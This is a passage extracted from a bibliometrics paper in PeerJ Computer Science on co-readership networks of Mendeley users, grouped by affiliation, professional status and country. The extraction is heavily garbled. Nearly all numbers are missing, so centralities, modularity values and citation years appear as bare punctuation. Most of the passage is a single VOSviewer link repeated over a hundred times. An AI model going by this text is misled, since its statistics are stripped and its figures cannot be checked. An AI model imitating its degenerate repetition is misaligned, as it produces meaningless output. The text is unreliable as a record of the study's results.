http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://dx.doi.org/ . /peerj-cs. figure affiliations in the bio-medical sciences (group in yellow) and affiliations in the natural sciences and engineering (group in pink). status hierarchy mendeley users have to assign one of predefined status groups to themselves. some of these professional status groups seem redundant, such as “student phd”, “student post-graduate”, and “doctoral student”. any merging or regrouping of these status groups, however, would be a rather arbitrary choice (haustein & larivière, a). we analyze the mendeley reader counts in the status groups as provided by mendeley and discuss these issues in the light of the results. figure shows that a common interest in papers is mainly shared among phd students, master’s students, and postdocs. other studies confirm the dominant position of these groups (zahedi, costas & wouters, ). in this study, researchers at academic institutions follow, but less so when compared with researchers at non-academic institutions. lecturers and senior lecturers are less involved than professors. librarians hardly participate in this network. note that this network is not modularized at all (q = . , cf. table ). all groups are fully connected to all ( ) other groups. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure four communities (colors) of affiliations among co-bookmarking readers. figure network of co-readers in terms of professional status. table shows eigenvector centralities of the different status groups among networked mendeley users (bonacich, ). groups with high eigenvector centrality (in this case, students) are more central, because they share their interests in publications with many other groups, while recursively taking into account the (eigenvector) centrality of these other groups (de nooy, mrvar & batagelj, ). however, the very high eigenvector centrality is probably to some extend due to the fact that students (especially phd and haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table eigenvector centralities and absolute number of reader counts (n) of different status groups among networked mendeley users (using the hubs & authorities routine in pajek). status group eigenvector centrality n student phd . , , student master . , , post doc . , , researcher at an academic institution . , doctoral student . , student bachelor . , student post-graduate . , assistant professor . , researcher at a non-academic institution . , full professor . , associate professor . , lecturer . , librarian . , senior lecturer . , master) and postdocs form by far the largest status groups. this is in agreement with previous studies which also found that students and postdocs represent the largest user status groups at mendeley (bornmann & haunschild, ; mohammadi et al., ). senior lecturers—a group with the lowest eigenvector centrality—seem to be interested in publications different from the other status groups. however, the eigenvector centrality is strongly influenced by the absolute number of reader counts. the spearman rank correlation coefficient between eigenvector centrality and reader counts is . . note that the status indication may be different among nations. for example, the ranks of “assistant professor” and “lecturer” are virtually non-existent in some countries. on the other side, ranks such as “reader” (sometimes different from “lecturer”) and “habilitand” are not covered by the mendeley classification system. the data suggests “habilitand” is a status in german- speaking countries for those working on a “habilitation” as a second phd which provides teaching rights in the university. that mendeley readers in the career stages “reader” and “habilitand” assign the status “as- sistant professor” to themselves, as this is the highest populated among the professorship categories. furthermore, some status groups seem redundant, e.g., “doctoral student”, “student post-graduate”, and “student phd”. however, most mendeley readers who are working on a doctoral thesis identify themselves as “student phd”. decomposition in terms of nations among the + countries in the world, countries are indicated among the readership of mendeley that actively bookmarked records in this database. these countries are all connected with an average degree of . which means that on average each node is linked to ( . %) other nodes in the network of nodes. the density of the network is . (cf. table ). the eigenvector centralities of the countries vary only between . and . . this small variation of eigenvector centrality between countries is probably due to the high connectivity of the countries although there is a large variation of reader counts from (liberia) to , (usa). haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure group of nations. the unlabeled circles next to the uk and the us indicate the netherlands and spain, respectively. the unlabeled circle between russia and hong kong is the czech republic. a version with all labels visible can be web-started from http://www.vosviewer.com/vosviewer. php?map=http://www.leydesdorff.net/mendeley/fig map.txt&network=http://www.leydesdorff.net/ mendeley/fig net.txt&n lines= &label size= . &label size variation= . . the community-finding algorithm distinguishes four groups. however, the modularity among these four groups is low (q = . , cf. table ) because of cross-group network connections: . a group of nations that are core to the scientific enterprise, including russia and china as well as two thirds of the oecd countries (fig. ). the oecd member states chile, greece, iceland, mexico, new zealand, norway, portugal, slovak republic, slovenia, and turkey are not part of this group. they are part of the second group. . a largest group of nations centered around brazil and india (fig. ). . a group of ten small nations with “niger” and “nigeria” as the central core (not shown). . the smallest group with only “guinea” and “guinea bissau” (not shown). haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= &label_size= . &label_size_variation= . http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= 